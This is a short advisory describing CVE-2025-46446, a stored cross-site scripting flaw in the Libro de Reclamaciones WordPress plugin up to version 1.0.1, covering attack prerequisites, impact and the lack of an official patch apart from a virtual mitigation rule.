CVE-2025-46446

Vulnerability

Analysis

The Libro de Reclamaciones WordPress plugin (versions up to and including 1.0.1) contains a Stored Cross-Site Scripting (XSS) vulnerability due to improper neutralization of user-supplied input during web page generation [1]. This means the plugin fails to sanitize or escape certain input fields before storing them in the database, and later renders that data without proper encoding when displaying it to users.

Attack

Vector and Prerequisites

Exploitation requires the attacker to have a low-privileged role (such as a subscriber or contributor) that can submit or modify content through the plugin's forms [1]. User interaction is needed for exploitation to succeed—a privileged user (e.g., admin) must perform an action such as clicking a malicious link, visiting a specially crafted page, or submitting a form that triggers the stored script [1]. The payload is stored on the server and executes in the browsers of other users (including administrators) who visit the affected page.

Impact

Successful exploitation allows an attacker to inject arbitrary HTML and JavaScript into the vulnerable site [1]. This can lead to session hijacking, forced redirects to malicious sites, defacement, or injection of unwanted advertisements and other malicious content that will execute whenever guests visit the compromised page [1].

Mitigation

Status

As of the publication date, no official patch has been released for CVE-2025-46446 [1]. The Patchstack team has issued a virtual mitigation rule to block attempted attacks until a permanent fix becomes available and can be safely applied [1]. The recommended immediate action is to update the plugin as soon as a patched version is released; if updating is not possible, site owners should contact their hosting provider or web developer for assistance [1].